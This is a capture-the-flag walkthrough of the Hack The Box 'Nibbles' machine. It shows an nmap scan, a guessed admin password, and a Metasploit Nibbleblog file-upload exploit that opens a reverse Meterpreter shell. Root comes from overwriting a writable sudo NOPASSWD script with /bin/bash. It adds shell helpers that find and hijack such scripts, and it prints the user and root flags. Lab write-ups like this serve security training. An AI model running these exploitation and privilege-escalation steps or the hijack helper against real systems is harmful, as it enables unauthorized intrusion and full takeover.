Today we are going to hack the HTB machine called Nibbles.
It is rated as easy.
Enumeration
To start, we run an nmap scan to see which ports are open (-p- covers all 65535 TCP ports, -A adds version detection, default scripts and OS guessing).
sml@m0nikE:~$ nmap -A -p- 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-02 15:19 CET
Nmap scan report for 10.10.10.75
Host is up (0.039s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.09 seconds
Only SSH and HTTP are exposed. Looking at the source of the web page on port 80 we find the following HTML comment:
/nibbleblog/ directory. Nothing interesting here!
Knowing that the site runs the Nibbleblog CMS, we look for an exploit that could be of use.
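Hints like the one above are easy to miss when scrolling through raw HTML, so here is a small helper that pulls every comment out of a page's source. This is an added example, not code from the original walkthrough: the function reads HTML on stdin and prints one comment body per line, flattening multi-line comments; the page embedded in it is constructed for the demo, and the curl line in the comment assumes curl is installed on your attacking box.

```shell
#!/bin/sh
# Added example: extract HTML comments from page source.
# Reads HTML on stdin and prints one comment body per line. Multi-line
# comments are flattened. Only POSIX tr/sed are used so it runs anywhere.
html_comments() {
    # 1. join all lines so a comment may span several of them
    # 2. break the stream so that every line ends with exactly one "-->"
    # 3. keep the text between the last "<!--" on the line and that "-->"
    # 4. trim surrounding whitespace
    tr '\n' ' ' |
    sed 's/-->/-->\
/g' |
    sed -n 's/.*<!--\(.*\)-->.*/\1/p' |
    sed 's/^[[:space:]]*//; s/[[:space:]]*$//'
}

# Constructed sample page for the demo (not the real Nibbles index page).
SAMPLE_HTML='<html><body>
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->
<!--
  todo: remove
  debug
-->
</body></html>'

# First comment found in the sample page.
first_comment() {
    printf '%s\n' "$SAMPLE_HTML" | html_comments | head -n 1
}

# Number of comments found in the sample page.
comment_count() {
    printf '%s\n' "$SAMPLE_HTML" | html_comments | wc -l | tr -d ' '
}

# Against a live target you would run (assumes curl is available):
#   curl -s http://10.10.10.75/ | html_comments
printf '%s\n' "$SAMPLE_HTML" | html_comments
```

The second sed splits on the closing marker rather than on `<!--`, so a page with several comments on one line or a comment spread over several lines still yields one clean line per comment.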
Exploitation
We find an exploit that fits (the Metasploit module for the Nibbleblog 4.0.3 arbitrary file upload in the My Image plugin, CVE-2015-6967), but it requires an admin username and password.
A quick search shows that the default user is admin, which is the one we will use; the password we had to "guess", and it turned out to be nibbles, the name of the machine.
Be careful when guessing: Nibbleblog blacklists the client IP after a few failed login attempts, so a blind brute force locks you out instead of getting you in.
With valid credentials we can now use the exploit.
msf5 > search nibble

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability
msf5 > use exploit/multi/http/nibbleblog_file_upload
msf5 exploit(multi/http/nibbleblog_file_upload) > show options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the web application
   USERNAME                    yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
targeturi => /nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > set rhosts 10.10.10.75
rhosts => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
[-] Exploit failed: The following options failed to validate: USERNAME, PASSWORD.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/nibbleblog_file_upload) > set username admin
username => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set password nibbles
password => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Sending stage (38288 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.75:47108) at 2019-11-02 15:30:42 +0100
[+] Deleted image.php
meterpreter > shell
Process 1446 created.
Channel 1 created.
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
user.txt
cd /home
ls
nibbler
cd nibbler
ls -la
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29 2017 .
drwxr-xr-x 3 root root 4096 Dec 10 2017 ..
-rw------- 1 nibbler nibbler 0 Dec 29 2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10 2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10 2017 personal.zip
-r-------- 1 nibbler nibbler 33 Dec 10 2017 user.txt
cat user.txt
b02ff32bb332deba49eeaed21152c8d8
Privilege Escalation
In nibbler's home directory we see a zip file called personal.zip.
We extract it.
Reading the code, monitor.sh on its own does not help us escalate privileges, so we keep looking for a clue.
We run sudo -l to see whether our user can execute any command with sudo (the "unable to resolve host" line is only a hostname resolution warning and does not affect the result):
$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
Our user can run monitor.sh, the script we just extracted, as root through sudo without a password.
The script sits inside nibbler's own home directory and, as the ls -l below shows, is world-writable (mode 777), so nibbler fully controls what root will execute.
This case is therefore as simple as adding a line to the script that runs bash; that should be enough to get a privileged shell.
Overwriting the script, as done here, is fine on a lab box; on a real engagement back it up or append to it so the original behaviour can be restored.
$ ls -l
total 4
-rwxrwxrwx 1 nibbler nibbler 10 Nov 2 10:57 monitor.sh
$ echo "/bin/bash" > monitor.sh
$ sudo /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:~/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:~/personal/stuff#
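The check that led to this shell, writable sudo NOPASSWD targets, is worth scripting so it is not missed on the next box. The helper below is an added example and not part of the original walkthrough: it parses `sudo -l` output, flags each NOPASSWD target that is writable (or sits in a writable directory, which lets you replace it), handles the `ALL` case, and hijacks a target by appending a shell line while keeping a backup. The `sudo -l` transcript and the monitor.sh used in the demo are constructed in a temporary directory; paths and hostnames in it mirror the walkthrough but are not taken from a live system.

```shell
#!/bin/sh
# Added example: find sudo NOPASSWD targets the current user can modify, then
# hijack one while keeping a backup. The demo data at the bottom is constructed.

# Read `sudo -l` output on stdin; print each NOPASSWD command path (or the
# literal ALL) on its own line. Arguments after the path are dropped.
nopasswd_targets() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*NOPASSWD:[[:space:]]*//p' |
    tr ',' '\n' |
    sed 's/^[[:space:]]*//; s/[[:space:]]*$//' |
    awk '{ print $1 }' |
    grep -E '^(/|ALL$)'
}

# Report whether one target can be abused: ALL means sudo runs anything; a
# writable file can be edited; a writable parent directory lets us replace the
# file even when the file itself is read-only. Returns 0 when abusable.
hijackable() {
    path=$1
    if [ "$path" = ALL ]; then
        echo "ALL: run any command, e.g. sudo /bin/bash"
        return 0
    fi
    if [ -w "$path" ]; then
        echo "$path: writable"
        return 0
    fi
    dir=$(dirname "$path")
    if [ -w "$dir" ]; then
        echo "$path: read-only, but parent $dir is writable (file can be replaced)"
        return 0
    fi
    echo "$path: not hijackable"
    return 1
}

# $1 = file holding `sudo -l` output (on a box: sudo -l > /tmp/s 2>/dev/null).
check_sudo_output() {
    nopasswd_targets < "$1" | while IFS= read -r p; do
        hijackable "$p" || true
    done
}

# Append a root shell to a writable target and keep a backup, instead of
# overwriting the script; restore later with: mv "$target.bak" "$target".
hijack_script() {
    target=$1
    cp -p "$target" "$target.bak" || return 1
    printf '\n/bin/bash\n' >> "$target"
    echo "$target: appended /bin/bash (backup at $target.bak)"
}

# Demo on a constructed sudo -l transcript and a throwaway monitor.sh.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/personal/stuff"
    printf '#!/bin/bash\necho monitoring\n' > "$tmp/personal/stuff/monitor.sh"
    chmod 777 "$tmp/personal/stuff/monitor.sh"
    cat > "$tmp/sudo-l.txt" <<EOF
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: $tmp/personal/stuff/monitor.sh, /nonexistent/dir/tool --flag
EOF
    check_sudo_output "$tmp/sudo-l.txt"
    hijack_script "$tmp/personal/stuff/monitor.sh"
    rm -rf "$tmp"
}

demo
```

The parent-directory check matters more than it looks: a root-owned, read-only script inside a directory you own can still be deleted and recreated, which is exactly the situation the sudo rule here creates by pointing at a path under /home/nibbler.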
root.txt
root@Nibbles:~/personal/stuff# cd /root
root@Nibbles:/root# cat root.txt
b6d745c0dfb6457c55591efc898ef88c
End
And with that we have both the user flag and the root flag.